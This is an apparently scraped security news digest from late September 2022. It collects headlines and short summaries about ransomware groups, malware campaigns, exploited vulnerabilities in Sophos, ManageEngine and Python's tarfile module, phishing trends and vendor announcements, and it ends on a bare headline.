                Elbit Systems of America, a subsidiary of defense giant Elbit Systems, disclosed a data breach after Black Basta ransomware gang claimed to have hacked it. In late June, the Black Basta ransomware gang claimed to have hacked Elbit Systems of America, the extortion group added the name of the company to its Tor leak site. […]

                The post Defense firm Elbit Systems of America discloses data breach appeared first on Security Affairs.


                Autosummary: Some of the documents published by the Black Basta gang on its leak site as proof of the hack included an audit report, confidentiality agreements, and a payroll report. Black Basta has been active since April 2022; like other ransomware operations, it implements a double-extortion attack model.


                New NullMixer dropper infects your PC with a dozen malware families

                exploits
                2022-09-27 https://www.bleepingcomputer.com/news/security/new-nullmixer-dropper-infects-your-pc-with-a-dozen-malware-families/
                A new malware dropper named "NullMixer" is infecting Windows devices with a dozen different malware families simultaneously through fake software cracks promoted on malicious sites in Google Search results. [...]

                Autosummary: Kaspersky, whose analysts discovered the new dropper, reports that NullMixer has already attempted infections on 47,778 of its customers across the United States, Germany, France, Italy, India, Russia, Brazil, Turkey, and Egypt.


                Lazarus hackers drop macOS malware via Crypto.com job offers

                exploits
                2022-09-27 https://www.bleepingcomputer.com/news/security/lazarus-hackers-drop-macos-malware-via-cryptocom-job-offers/
                The North Korean Lazarus hacking group is now using fake "Crypto.com" job offers to hack developers and artists in the crypto space, likely with a long-term goal of stealing digital assets and cryptocurrency. [...]

                Autosummary: List of files created under the new directory (Sentinel One) The second stage is "WifiAnalyticsServ.app" that loads a persistence agent ("wifianalyticsagent"), which eventually connects to the C2 server at "market.contradecapital[.]com" to fetch the final payload, "WiFiCloudWidget."


                North Korea-linked Lazarus continues to target job seekers with macOS malware

                exploits ransomware
                2022-09-27 https://securityaffairs.co/wordpress/136297/apt/lazarus-apt-targeting-macos.html

                North Korea-linked Lazarus APT group is targeting macOS users searching for jobs in the cryptocurrency industry. North Korea-linked Lazarus APT group continues to target macOS with a malware campaign using job opportunities as a lure. The attackers aimed at stealing credentials for the victims’ wallets. Last week, SentinelOne researchers discovered decoy documents advertising positions […]

                The post North Korea-linked Lazarus continues to target job seekers with macOS malware appeared first on Security Affairs.



                Flaw in some ManageEngine apps is being actively exploited, says CISA

                exploits
                2022-09-27 https://www.malwarebytes.com/blog/news/2022/09/cisa-reveals-flaw-in-some-manageengine-apps-is-actively-exploited

                Categories: Exploits and vulnerabilities

                Categories: News

                The critical CVE-2022-35405 flaw affects several Zoho ManageEngine products. Federal and private organizations must patch now!

                The post Flaw in some ManageEngine apps is being actively exploited, says CISA appeared first on Malwarebytes Labs.


                Fortress Information Security collaborates with ONG-ISAC to improve supply chain cybersecurity

                ciber
                2022-09-27 https://www.helpnetsecurity.com/2022/09/28/fortress-information-security-ong-isac/

                Fortress Information Security and the Oil and Natural Gas Information Sharing Analysis Center (ONG-ISAC) announced an industry-wide initiative focused on securing hardware and software components and supply chains. The software and hardware used by oil and natural gas systems are critical to the industry’s reliable and safe operation. In addition, the supply chains for these products are at increased risk of compromise. Fortress will enable ONG-ISAC members to manage these risks securely and cost-effectively. For … More

                The post Fortress Information Security collaborates with ONG-ISAC to improve supply chain cybersecurity appeared first on Help Net Security.


                Autosummary: “As an industry, we must face today’s cybersecurity challenges as a united front,” said Angela Hahn, executive director of the ONG-ISAC.


                Phishing attacks skyrocketing, over 1 million observed

                financial
                2022-09-26 https://www.helpnetsecurity.com/2022/09/26/phishing-activity-trends-2022/

                The APWG’s Phishing Activity Trends Report reveals that in the second quarter of 2022, the APWG observed 1,097,811 total phishing attacks — the worst quarter for phishing that APWG has ever observed. The total for June was 381,717 attacks or phishing sites. The number of phishing attacks reported has quadrupled since early 2020 — when APWG was observing between 68,000 and 94,000 attacks per month. In the first quarter of 2022, OpSec Security found that … More

                The post Phishing attacks skyrocketing, over 1 million observed appeared first on Help Net Security.


                Autosummary: “We are still seeing fraud coming in via the typical OTT apps (WhatsApp, WeChat, Facebook Messenger, etc.), but the SMS-based fraud is really the kicker here,” Harris said.


                See how Pentera identifies and mitigates the risk of your most exploitable exposed credentials

                exploits
                2022-09-26 https://grahamcluley.com/feed-sponsor-pentera/
                Graham Cluley Security News is sponsored this week by the folks at Pentera. Thanks to the great team there for their support! Leaked and stolen credentials continue to pose a critical risk to organizations globally. In fact, 65% of breaches involve leaked credentials taken from the dark web and other sources. While threat intelligence tools … Continue reading "See how Pentera identifies and mitigates the risk of your most exploitable exposed credentials"


                Exmatter exfiltration tool used to implement new extortion tactics

                industry
                2022-09-26 https://securityaffairs.co/wordpress/136226/cyber-crime/exmatter-tool-shift-extortion-tactics.html

                Ransomware operators switch to new extortion tactics by using the Exmatter malware and adding new data corruption functionality. The data extortion landscape is constantly evolving and threat actors are devising new extortion techniques, this is the case of threat actors using the Exmatter malware. Cyderes Special Operations and Stairwell Threat Research researchers spotted a sample […]

                The post Exmatter exfiltration tool used to implement new extortion tactics appeared first on Security Affairs.



                To encrypt or to destroy? Ransomware affiliates plan to try the latter

                exploits ransomware
                2022-09-26 https://www.helpnetsecurity.com/2022/09/26/ransomware-data-destruction/

                Ransomware gangs are planning on trying out a new tactic, and it involves the destruction of the victims’ data. Targeting the data Researchers from Symantec, Cyderes and Stairwell have recently analyzed a new version of the Exmatter data exfiltration tool and have spotted a new capability: data corruption. Used in conjunction with multi-platform ALPHV (aka BlackCat, aka Noberus) ransomware, this Exmatter sample takes specific file types from selected directories and uploads them to attacker-controlled servers. … More

                The post To encrypt or to destroy? Ransomware affiliates plan to try the latter appeared first on Help Net Security.


                Autosummary: Triple extortion (encryption + data exfiltration and the threat of data leaking + DDoS attack aimed at disrupting targets’ services) The no-encryption approach + offer to share information on how the target was breached This latest approach of corrupting data and asking for money to return it to the victim might work in some cases, especially if the victim organization does not have a good plan to recover from data loss or does not follow data backup best practices.


                RCE in Sophos Firewall is being exploited in the wild (CVE-2022-3236)

                exploits
                2022-09-26 https://www.helpnetsecurity.com/2022/09/26/cve-2022-3236/

                Sophos has patched an actively exploited remote code execution vulnerability (CVE-2022-3236) in its Firewall solutions, and has pushed the fix to customers who have automatic installation of hotfixes enabled. If this news triggers a feeling of déjà vu, there’s a good reason: earlier this year, another zero-day (CVE-2022-1040) in the same component was leveraged by attackers against “a small set of specific organizations, primarily in the South Asia region” – and this time around is … More

                The post RCE in Sophos Firewall is being exploited in the wild (CVE-2022-3236) appeared first on Help Net Security.


                Autosummary: If this news triggers a feeling of déjà vu, there’s a good reason: earlier this year, another zero-day (CVE-2022-1040) in the same component was leveraged by attackers against “a small set of specific organizations, primarily in the South Asia region” – and this time around is the same.


                BlackCat Ransomware Attackers Spotted Fine-Tuning Their Malware Arsenal

                exploits ransomware
                2022-09-26 https://thehackernews.com/2022/09/blackcat-ransomware-attackers-spotted.html
                The BlackCat ransomware crew has been spotted fine-tuning their malware arsenal to fly under the radar and expand their reach. "Among some of the more notable developments has been the use of a new version of the Exmatter data exfiltration tool, and the use of Eamfo, information-stealing malware that is designed to steal credentials stored by Veeam backup software," researchers from Symantec "

                Autosummary: BlackCat, also known by the names ALPHV and Noberus, is attributed to an adversary tracked as Coreid (aka FIN7, Carbanak, or Carbon Spider) and is said to be a rebranded successor of DarkSide and BlackMatter, both of which shut shop last year following a string of high-profile attacks, including that of Colonial Pipeline.


                Ukraine warns allies of Russian plans to escalate cyberattacks

                ciber
                2022-09-26 https://www.bleepingcomputer.com/news/security/ukraine-warns-allies-of-russian-plans-to-escalate-cyberattacks/
                The Ukrainian military intelligence service warned today that Russia is planning "massive cyber-attacks" targeting the critical infrastructure of Ukraine and its allies. [...]


                Beware Revolut frozen card scams sent via SMS text

                financial
                2022-09-26 https://grahamcluley.com/beware-revolut-frozen-card-scams-sent-via-sms-text/
                Users of Revolut, the popular banking app, would be wise to be on their guard - as scammers are sending out barrages of SMS text messages, posing as official communications from the financial firm.


                New Erbium password-stealing malware spreads as game cracks, cheats

                exploits
                2022-09-26 https://www.bleepingcomputer.com/news/security/new-erbium-password-stealing-malware-spreads-as-game-cracks-cheats/
                The new "Erbium" information-stealing malware is being distributed as fake cracks and cheats for popular video games to steal victims' credentials and cryptocurrency wallets. [...]

                Autosummary: Targeted hot cryptocurrency wallets (Cyfirma). Cold desktop wallets like Exodus, Atomic, Armory, Bitcoin-Core, Bytecoin, Dash-Core, Electrum, Electron, Coinomi, Ethereum, Litecoin-Core, Monero-Core, Zcash, and Jaxx are also stolen.


                Hackers use PowerPoint files for "mouseover" malware delivery

                exploits
                2022-09-26 https://www.bleepingcomputer.com/news/security/hackers-use-powerpoint-files-for-mouseover-malware-delivery/
                Hackers believed to work for Russia have started using a new code execution technique that relies on mouse movement in Microsoft PowerPoint presentations to trigger a malicious PowerShell script. [...]

                Autosummary: “If a new file is found, the content is downloaded and decrypted through an AES-256-CBC decryption algorithm,” Cluster25 says, adding that “the malware allows remote command execution by allocating a new region of memory and executing the received shellcode by calling a new dedicated thread.”


                Russia prepares massive cyberattacks on the critical infrastructure of Ukraine and its allies

                ciber
                2022-09-26 https://securityaffairs.co/wordpress/136265/cyber-warfare-2/russia-prepares-massive-cyberattacks.html

                The Ukrainian military intelligence warns that Russia is planning to escalate cyberattacks targeting Ukraine and Western allies. The Main Directorate of Intelligence of the Ministry of Defence of Ukraine (HUR MO) warns that Russia is planning to escalate cyberattacks targeting the critical infrastructure of Ukraine and western countries. According to the Ukrainian military intelligence service, […]

                The post Russia prepares massive cyberattacks on the critical infrastructure of Ukraine and its allies appeared first on Security Affairs.



                Calling in the ransomware negotiator, with Kurtis Minder: Lock and Code S03E20

                exploits ransomware
                2022-09-26 https://www.malwarebytes.com/blog/podcast/2022/09/calling-in-the-ransomware-negotiator-with-kurtis-minder-lock-and-code-s03e20

                Categories: Podcast

                This week on Lock and Code, we speak with Kurtis Minder, CEO of GroupSense, about how a company decides to bring in a ransomware negotiator when it's hit with the destructive malware.


                The post Calling in the ransomware negotiator, with Kurtis Minder: Lock and Code S03E20 appeared first on Malwarebytes Labs.

                Autosummary: The negotiator, or negotiators, can work closely with a company's executives, security staff, legal department, and press handlers to accurately and firmly represent the company's needs during a ransomware attack.


                Windows 11 pulls ahead of Windows 10 in anti-phishing stakes

                financial
                2022-09-26 https://www.malwarebytes.com/blog/news/2022/09/windows-11-pulls-ahead-of-windows-10-in-anti-phishing-stakes

                Categories: News

                Tags: Windows 11

                Tags: Windows 10

                Tags: phishing

                Tags: protection

                Tags: warning

                Tags: message

                Tags: Defender Smartscreen

                We take a look at a new set of security features for Windows 11, and see what Windows 10 can expect to miss out on.


                The post Windows 11 pulls ahead of Windows 10 in anti-phishing stakes appeared first on Malwarebytes Labs.

                Autosummary: Organisations can configure Enhanced Phishing Protection to warn users about password reuse, unsafe apps, and malicious activity, and can switch the feature's audit mode on and off, which determines whether it sends telemetry about unsafe password events. Anti-phishing tools: Enhanced phishing protection, by way of SmartScreen, is the name of the game, and Microsoft is all too happy to explain the changes.


                Twitter fixes bug that left devices logged in after password reset

                exploits
                2022-09-26 https://www.malwarebytes.com/blog/news/2022/09/twitter-fixes-bug-that-left-devices-logged-in-after-password-reset

                Categories: News

                Categories: Privacy

                Twitter says it has fixed a bug that meant users weren't logged out of active sessions on all devices after manually resetting their passwords.


                The post Twitter fixes bug that left devices logged in after password reset appeared first on Malwarebytes Labs.



                HBC selects Veeam to improve data protection and ransomware resilience

                exploits ransomware
                2022-09-26 https://www.helpnetsecurity.com/2022/09/27/hbc-veeam/

                Veeam Software announced that HBC, a holding company of investments and businesses that operates at the intersection of technology, retail operations and real estate, has chosen Veeam Availability Suite to centralize data protection on premises and across clouds. Veeam helps HBC ensure business continuity, meet internal governance compliance requirements and protect against ransomware. Additionally, HBC saved more than $1 million in a one-time capital expenditure and saves $600,000 in recurring operational expenses annually. From the … More

                The post HBC selects Veeam to improve data protection and ransomware resilience appeared first on Help Net Security.

                Autosummary: It’s the majority owner of iconic e-commerce companies such as Saks, a leading online destination for luxury fashion, Saks OFF 5TH, a premier luxury off-price e-commerce company and The Bay, a Canadian e-commerce marketplace. “To improve upon the customer experience, we began a digital transformation to accelerate our e-commerce business,” said Ope Bakare, Chief Technical Officer, HBC.


                Week in review: Revolut data breach, ManageEngine RCE flaw, free Linux security training courses

                financial
                2022-09-25 https://www.helpnetsecurity.com/2022/09/25/week-in-review-revolut-data-breach-manageengine-rce-flaw-free-linux-security-training-courses/

                GTA 6 in-development footage leaked American video game publisher Rockstar Games has suffered an unfortunate data leak: someone has released online in-development footage/videos for Grand Theft Auto (GTA) 6, the eagerly anticipated instalment of the popular game. Uber says Lapsus$ gang is behind the recent breach Uber has confirmed that the recent breach of its systems started with a compromised account belonging to a contractor. Python tarfile vulnerability affects 350,000 open-source projects (CVE-2007-4559) Trellix Advanced … More

                The post Week in review: Revolut data breach, ManageEngine RCE flaw, free Linux security training courses appeared first on Help Net Security.

                Autosummary: High severity vulnerabilities found in Harbor open-source artifact registry: Oxeye security researchers have uncovered several new high severity variants of the IDOR (Insecure Direct Object Reference) vulnerabilities (CVE-2022-31671, CVE-2022-31666, CVE-2022-31670, CVE-2022-31669, CVE-2022-31667) in CNCF-graduated project Harbor, the popular open-source artifact registry by VMware. Open-source software usage slowing down for fear of vulnerabilities, exposures, or risks: Anaconda released its annual 2022 State of Data Science report, revealing the widespread trends, opportunities, and perceived blockers facing the data science, machine learning (ML), and artificial intelligence (AI) industries.


                Ransomware data theft tool may show a shift in extortion tactics

                exploits industry
                2022-09-25 https://www.bleepingcomputer.com/news/security/ransomware-data-theft-tool-may-show-a-shift-in-extortion-tactics/
                Data exfiltration malware known as Exmatter and previously linked with the BlackMatter ransomware group is now being upgraded with data corruption functionality that may indicate a new tactic that ransomware affiliates might switch to in the future. [...]

                Autosummary: Many ransomware operations run as a Ransomware-as-a-Service, where operators/developers are in charge of developing the ransomware, payment site, and handling negotiations, while affiliates join to breach corporate networks, steal data, delete backups, and encrypt devices.


                Hackers Actively Exploiting New Sophos Firewall RCE Vulnerability

                exploits
                2022-09-24 https://thehackernews.com/2022/09/hackers-actively-exploiting-new-sophos.html
                Security software company Sophos has warned of cyberattacks targeting a recently addressed critical vulnerability in its firewall product. The issue, tracked as CVE-2022-3236 (CVSS score: 9.8), impacts Sophos Firewall v19.0 MR1 (19.0.1) and older and concerns a code injection vulnerability in the User Portal and Webadmin components that could result in remote code execution. The company said it


                Microsoft SQL servers hacked in TargetCompany ransomware attacks

                exploits ransomware
                2022-09-24 https://www.bleepingcomputer.com/news/security/microsoft-sql-servers-hacked-in-targetcompany-ransomware-attacks/
                Security analysts at ASEC have discovered a new wave of attacks targeting vulnerable Microsoft SQL servers, involving the deployment of a ransomware strain named FARGO. [...]

                Autosummary: Exempt from encryption are several Microsoft Windows system directories, the boot files, Tor Browser, Internet Explorer, user customizations and settings, the debug log file, or the thumbnail database.


                American Airlines learned they were breached from phishing targets

                financial
                2022-09-24 https://www.bleepingcomputer.com/news/security/american-airlines-learned-they-were-breached-from-phishing-targets/
                American Airlines says its Cyber Security Response Team (CIRT) found out about a recently disclosed data breach from the targets of a phishing campaign that was using an employee's hacked Microsoft 365 account. [...]

                Autosummary: As American disclosed in the notification letters, personal information exposed in the attack may have included employees' and customers' names, dates of birth, mailing addresses, phone numbers, email addresses, driver's license numbers, passport numbers, or certain medical information.


                American Airlines learned it was breached from phishing targets

                financial
                2022-09-24 https://www.bleepingcomputer.com/news/security/american-airlines-learned-it-was-breached-from-phishing-targets/
                American Airlines says its Cyber Security Response Team found out about a recently disclosed data breach from the targets of a phishing campaign that was using an employee's hacked Microsoft 365 account. [...]

                Autosummary: As American disclosed in the notification letters, personal information exposed in the attack may have included employees' and customers' names, dates of birth, mailing addresses, phone numbers, email addresses, driver's license numbers, passport numbers, or certain medical information.


                Mitigating the cybersecurity crisis for the school year ahead

                ciber
                2022-09-23 https://www.helpnetsecurity.com/2022/09/23/schools-cyberattacks/

                As students head back into the classroom, K-12 district leaders are faced with the difficult task of preventing and mitigating cybersecurity threats against their districts. School systems have become a popular target for cybercriminals over the last few years due to their growing reliance on technology and their wealth of data. It’s a growing problem that is producing costly ramifications for school districts of all sizes across the country who are already grappling with tight … More

                The post Mitigating the cybersecurity crisis for the school year ahead appeared first on Help Net Security.

                Autosummary: As the school year kicks into high gear, the ongoing cybersecurity crisis should be viewed as a universal problem that is addressed not only by education leaders, but also policymakers and government leaders, education technology partners and vendors, school boards, and community members. On average, it costs education institutions $2.73 million to remediate the impact of a ransomware attack, including the cost of downtime, data recovery, device and network repairs, security updates and lost opportunity.


                Fake Indian Banking Rewards Apps Targeting Android Users with Info-stealing Malware

                financial exploits
                2022-09-23 https://thehackernews.com/2022/09/fake-indian-banking-rewards-apps.html
                An SMS-based phishing campaign is targeting customers of Indian banks with information-stealing malware that masquerades as a rewards application. The Microsoft 365 Defender Research Team said that the messages contain links that redirect users to a sketchy website that triggers the download of the fake banking rewards app for ICICI Bank. "The malware's RAT capabilities allow the attacker to


                “Fake crypto millionaire” charged with alleged $1.7M cryptomining scam

                financial
                2022-09-23 https://www.bitdefender.com/blog/hotforsecurity/fake-crypto-millionaire-charged-with-alleged-1-7m-cryptomining-scam/
                A self-proclaimed cryptocurrency millionaire has been charged with multiple felonies for his alleged role in a scam that purported to sell a high-powered cryptomining machine called the "Bitex Blockbuster" that did not actually exist. Read more in my article on the Hot for Security blog.


                Critical ManageEngine RCE flaw is being exploited (CVE-2022-35405)

                exploits
                2022-09-23 https://www.helpnetsecurity.com/2022/09/23/cve-2022-35405-exploited/

                The US Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2022-35405, a critical remote code execution vulnerability in ManageEngine PAM360, Password Manager Pro, and Access Manager Plus, to its Known Exploited Vulnerabilities (KEV) Catalog. The details of in-the-wild exploitation of the flaw aren’t available – though, according to data collected by Greynoise, exploitation attempts don’t seem widespread. About CVE-2022-35405 CVE-2022-35405 is a remote code execution vulnerability that can be exploited to execute arbitrary code on … More

                The post Critical ManageEngine RCE flaw is being exploited (CVE-2022-35405) appeared first on Help Net Security.



                CISA Warns of Hackers Exploiting Recent Zoho ManageEngine Vulnerability

                exploits
                2022-09-23 https://thehackernews.com/2022/09/cisa-warns-of-hackers-exploiting-recent.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a recently disclosed security flaw in Zoho ManageEngine to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation. "Zoho ManageEngine PAM360, Password Manager Pro, and Access Manager Plus contain an unspecified vulnerability which allows for remote code execution," the agency


                Firing Your Entire Cybersecurity Team? Are You Sure?

                ciber
                2022-09-23 https://thehackernews.com/2022/09/firing-your-entire-cybersecurity-team.html
                What on earth were they thinking? That's what we – and other security experts – were wondering when content giant Patreon recently dismissed its entire internal cybersecurity team in exchange for outsourced services. Of course, we don't know the true motivations for this move. But, as outsiders looking in, we can guess the cybersecurity implications of the decision would be inescapable for any

                Autosummary: Yes, SLAs can guide performance standards, but when it matters, in a crisis, an SLA will never replicate the urgent sense of "right now" that you have with a dedicated, internal team. Bad for press, bad for finances, bad for security: Was there a valid reason other than cost savings for dismissing an entire in-house cybersecurity team? Lack of competence, insider risk, interpersonal issues, lack of communication, or failure to achieve business goals?


                Void Balaur Hackers-for-Hire Targeting Russian Businesses and Politics Entities

                industry
                2022-09-23 https://thehackernews.com/2022/09/void-balaur-hackers-for-hire-group-now.html
                A hack-for-hire group that was first exposed in 2019 has expanded its focus to set its sights on entities with business or political ties to Russia. Dubbed Void Balaur, the cyber mercenary collective has a history of launching cyberattacks against biotechnology and telecom companies since 2015. As many as 3,500 victims have been reported as of November 2021. "Void Balaur [...] primarily dabbles

                Autosummary: "Void Balaur also goes after targets valuable for prepositioning or facilitating future attacks," SentinelOne researcher Tom Hegel said, adding the targets span Russia, the U.S., the U.K., Taiwan, Brazil, Kazakhstan, Ukraine, Moldova, Georgia, Spain, Central African Republic, and Sudan.


                Surge in Magento 2 template attacks exploiting the CVE-2022-24086 flaw

                exploits
                2022-09-23 https://securityaffairs.co/wordpress/136112/hacking/magento-2-cve-2022-24086.html

                Sansec researchers warn of a surge in hacking attempts targeting a critical Magento 2 vulnerability tracked as CVE-2022-24086. Sansec researchers are warning of a hacking campaign targeting the CVE-2022-24086 Magento 2 vulnerability. Magento is a popular open-source e-commerce platform owned by Adobe, which is used by hundreds of thousands of e-stores worldwide. In February, Adobe […]

                The post Surge in Magento 2 template attacks exploiting the CVE-2022-24086 flaw appeared first on Security Affairs.



                Sophos warns of new firewall RCE bug exploited in attacks

                exploits
                2022-09-23 https://www.bleepingcomputer.com/news/security/sophos-warns-of-new-firewall-rce-bug-exploited-in-attacks/
                Sophos warned today that a critical code injection security vulnerability in the company's Firewall product is being exploited in the wild. [...]

                Autosummary: DriftingCloud APT exploiting zero-day bug in Sophos Firewall (Volexity). Threat actors have also abused an XG Firewall SQL injection zero-day starting early 2020 with the goal of stealing sensitive data such as usernames and passwords.


                CISA adds Zoho ManageEngine flaw to its Known Exploited Vulnerabilities Catalog

                exploits
                2022-09-23 https://securityaffairs.co/wordpress/136120/hacking/cisa-zoho-manageengine-known-exploited-vulnerabilities-catalog.html

                CISA added a security flaw in Zoho ManageEngine, tracked as CVE-2022-35405, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a recently disclosed security flaw in Zoho ManageEngine, tracked as CVE-2022-35405 (CVSS score 9.8), to its Known Exploited Vulnerabilities Catalog. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of […]

                The post CISA adds Zoho ManageEngine flaw to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.



                The Week in Ransomware - September 23rd 2022 - LockBit leak

                exploits ransomware
                2022-09-23 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-23rd-2022-lockbit-leak/
                This week we saw some embarrassment for the LockBit ransomware operation when their programmer leaked a ransomware builder for the LockBit 3.0 encryptor. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @struppigel, @DanielGallagher, @demonslay335, @malwrhunterteam, @Seifreed, @malwareforme, @fwosar, @BleepinComputer, @FourOctets, @billtoulas, @jorntvdw, @PolarToffee, @Ionut_Ilascu, @VK_Intel, @LawrenceAbrams, @serghei, @S2W_Official, @GeeksCyber, @BroadcomSW, @pcrisk, @3xp0rtblog, @vxunderground, @PogoWasRight, @AhnLab_SecuInfo, and @zscaler. September 20th 2022: The Hive ransomware operation claimed responsibility for an attack on the New York Racing Association (NYRA), which previously disclosed that a cyber attack on June 30, 2022, impacted IT operations and website availability and compromised member data.


                Sophos warns of a new actively exploited flaw in Firewall product

                exploits
                2022-09-23 https://securityaffairs.co/wordpress/136135/security/sophos-user-portal-webadmin-bug.html

                Sophos warns that a critical code injection security vulnerability in its Firewall product is actively exploited in the wild. Sophos warns of a critical code injection security vulnerability, tracked as CVE-2022-3236, affecting its Firewall product which is being exploited in the wild. The CVE-2022-3236 flaw resides in the User Portal and Webadmin of Sophos Firewall, […]

                The post Sophos warns of a new actively exploited flaw in Firewall product appeared first on Security Affairs.



                Malwarebytes recognized as endpoint security leader by G2

                exploits
                2022-09-23 https://www.malwarebytes.com/blog/business/2022/09/malwarebytes-recognized-as-endpoint-security-leader-by-g2

                Categories: Business

                G2 has released their Fall 2022 reports, ranking Malwarebytes as the leader across a number of endpoint protection categories based on factual customer reviews.


                The post Malwarebytes recognized as endpoint security leader by G2 appeared first on Malwarebytes Labs.

                Autosummary: Summary report: Malwarebytes has ranked #1 for 4 reports overall across all vendors and market segments (Grid, Results Index, Implementation Index, Usability Index); #1 for 5 Mid-Market reports (Results Index, Relationship Index, Grid report (main report), Implementation Index, Usability Index); and #1 for 1 Small Business report (Grid report (main report)). Most rapid time to value (TTV): small- to medium-sized business (SMB) security teams need a solution that is quick to deploy, easy to set up, and uncomplicated. More resources: Malwarebytes receives highest rankings in recent third-party tests; Why MRG-Effitas matters to SMBs; MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks; Why MITRE matters to SMBs.


                A first look at the builder for LockBit 3.0 Black

                ransomware
                2022-09-23 https://www.malwarebytes.com/blog/news/2022/09/lockbit-builder-leaked-by-disgruntled-developer

                Categories: News

                Categories: Ransomware

                Tags: LockBit

                Tags: builder

                Tags: leaked

                The LockBit gang's latest ransomware builder has been leaked, and we have a copy


                The post A first look at the builder for LockBit 3.0 Black appeared first on Malwarebytes Labs.

                Autosummary: Posted: September 23, 2022. The LockBit gang's latest ransomware builder has been leaked, and we have a copy. A few months after the LockBit gang released version 3.0 of its ransomware, LockBit 3.0 Black, the builder for it has been leaked by what seems to be a disgruntled developer.


                Commvault Metallic ThreatWise proactively detects unknown and zero-day threats

                exploits
                2022-09-22 https://www.helpnetsecurity.com/2022/09/22/commvault-metallic-threatwise/

                Commvault releases Metallic ThreatWise, an early warning system that proactively surfaces unknown and zero-day threats to minimize compromised data and business impact. According to Enterprise Strategy Group, only 12% of the IT directors surveyed indicated confidence in having the proper tools and necessary location agnostic protection to secure data equally across on-premises and cloud. With ThreatWise, Commvault is further defining data security with an early warning that no other vendor in this space provides. It … More

                The post Commvault Metallic ThreatWise proactively detects unknown and zero-day threats appeared first on Help Net Security.



                A disgruntled developer is the alleged source of the leak of the Lockbit 3.0 builder

                ransomware
                2022-09-22 https://securityaffairs.co/wordpress/136056/data-breach/lockbit-3-0-builder-leak.html

                A disgruntled developer seems to be responsible for the leak of the builder for the latest encryptor of the LockBit ransomware gang. The leak of the builder for the latest encryptor of the LockBit ransomware gang made the headlines, it seems that the person who published it is a disgruntled developer. The latest version of […]

                The post A disgruntled developer is the alleged source of the leak of the Lockbit 3.0 builder appeared first on Security Affairs.



                Python tarfile vulnerability affects 350,000 open-source projects (CVE-2007-4559)

                exploits
                2022-09-22 https://www.helpnetsecurity.com/2022/09/22/cve-2007-4559/

                Trellix Advanced Research Center published its research into CVE-2007-4559, a vulnerability estimated to be present in over 350,000 open-source projects and prevalent in closed-source projects. Successful exploit The vulnerability exists in the Python tarfile module which is a default module in any project using Python and is found extensively in frameworks created by Netflix, AWS, Intel, Facebook, Google, and applications used for machine learning, automation and docker containerization. The vulnerability can be exploited by uploading … More

                The post Python tarfile vulnerability affects 350,000 open-source projects (CVE-2007-4559) appeared first on Help Net Security.



                15-Year-Old Unpatched Python Vulnerability Potentially Affects Over 350,000 Projects

                exploits
                2022-09-22 https://thehackernews.com/2022/09/15-year-old-unpatched-python.html
                As many as 350,000 open source projects are believed to be potentially vulnerable to exploitation as a result of a security flaw in a Python module that has remained unpatched for 15 years. The open source repositories span a number of industry verticals, such as software development, artificial intelligence/machine learning, web development, media, security, IT management. The shortcoming,


                BlackCat ransomware’s data exfiltration tool gets an upgrade

                exploits ransomware
                2022-09-22 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-s-data-exfiltration-tool-gets-an-upgrade/
                The BlackCat ransomware (aka ALPHV) isn't showing any signs of slowing down, and the latest example of its evolution is a new version of the gang's data exfiltration tool used for double-extortion attacks. [...]

                Autosummary: Named "Exmatter," the tool was used since BlackCat's launch in November 2021 and was heavily updated in August 2022, featuring the following changes: Limit type of files to exfiltrate to: PDF, DOC, DOCX, XLS, PNG, JPG, JPEG, TXT, BMP, RDP, SQL, MSG, PST, ZIP, RTF, IPT, and DWG.


                How to have fun negotiating with a ransomware gang

                exploits ransomware
                2022-09-22 https://grahamcluley.com/how-to-have-fun-negotiating-with-a-ransomware-gang/
                Can negotiating your firm’s ransomware payment actually be fun? Well, if it’s a game rather than the real thing then yes! The inventive bods at the Financial Times have created an imaginative ransomware negotiation simulator which lets you imagine you’re in the hot seat at a hacked company, trying to stop cybercriminals from releasing sensitive … Continue reading "How to have fun negotiating with a ransomware gang"

                Autosummary: After a ransomware attack, the company’s day-to-day operations are severely disrupted, meaning that servers are down, products can’t ship, and employees aren’t being paid.


                Researchers Disclose Critical Vulnerability in Oracle Cloud Infrastructure

                exploits
                2022-09-22 https://thehackernews.com/2022/09/researchers-disclose-critical.html
                Researchers have disclosed a new severe Oracle Cloud Infrastructure (OCI) vulnerability that could be exploited by users to access the virtual disks of other Oracle customers. "Each virtual disk in Oracle's cloud has a unique identifier called OCID," Shir Tamari, head of research at Wiz, said in a series of tweets. "This identifier is not considered secret, and organizations do not treat it as "

                Autosummary: "


                A 15-Year-Old Unpatched Python bug potentially impacts over 350,000 projects

                exploits
                2022-09-22 https://securityaffairs.co/wordpress/136081/hacking/python-bug-cve-2007-4559.html

                More than 350,000 open source projects can be potentially affected by an unpatched Python vulnerability, tracked as CVE-2007-4559 (CVSS score: 6.8), that was discovered 15 years ago. The issue is a directory traversal vulnerability that resides in the ‘extract’ […]

                The post A 15-Year-Old Unpatched Python bug potentially impacts over 350,000 projects appeared first on Security Affairs.

                "

                Autosummary: "


                Atlassian Confluence bug CVE-2022-26134 exploited in cryptocurrency mining campaign

                exploits
                2022-09-22 https://securityaffairs.co/wordpress/136071/malware/atlassian-confluence-flaw-cryptomining.html

                Threat actors are targeting unpatched Atlassian Confluence servers as part of an ongoing crypto mining campaign. Trend Micro researchers warn of an ongoing crypto mining campaign targeting Atlassian Confluence servers affected by the CVE-2022-26134 vulnerability. The now-patched critical security flaw was disclosed by Atlassian in early June, at the time the company warned of a […]

                The post Atlassian Confluence bug CVE-2022-26134 exploited in cryptocurrency mining campaign appeared first on Security Affairs.

                "

                Autosummary: "


                Microsoft Exchange servers hacked via OAuth apps for phishing

                financial
                2022-09-22 https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-via-oauth-apps-for-phishing/
                Microsoft says a threat actor gained access to cloud tenants hosting Microsoft Exchange servers in credential stuffing attacks, with the end goal of deploying malicious OAuth applications and sending phishing emails. [...] "

                Autosummary: "


                Critical Magento vulnerability targeted in new surge of attacks

                exploits
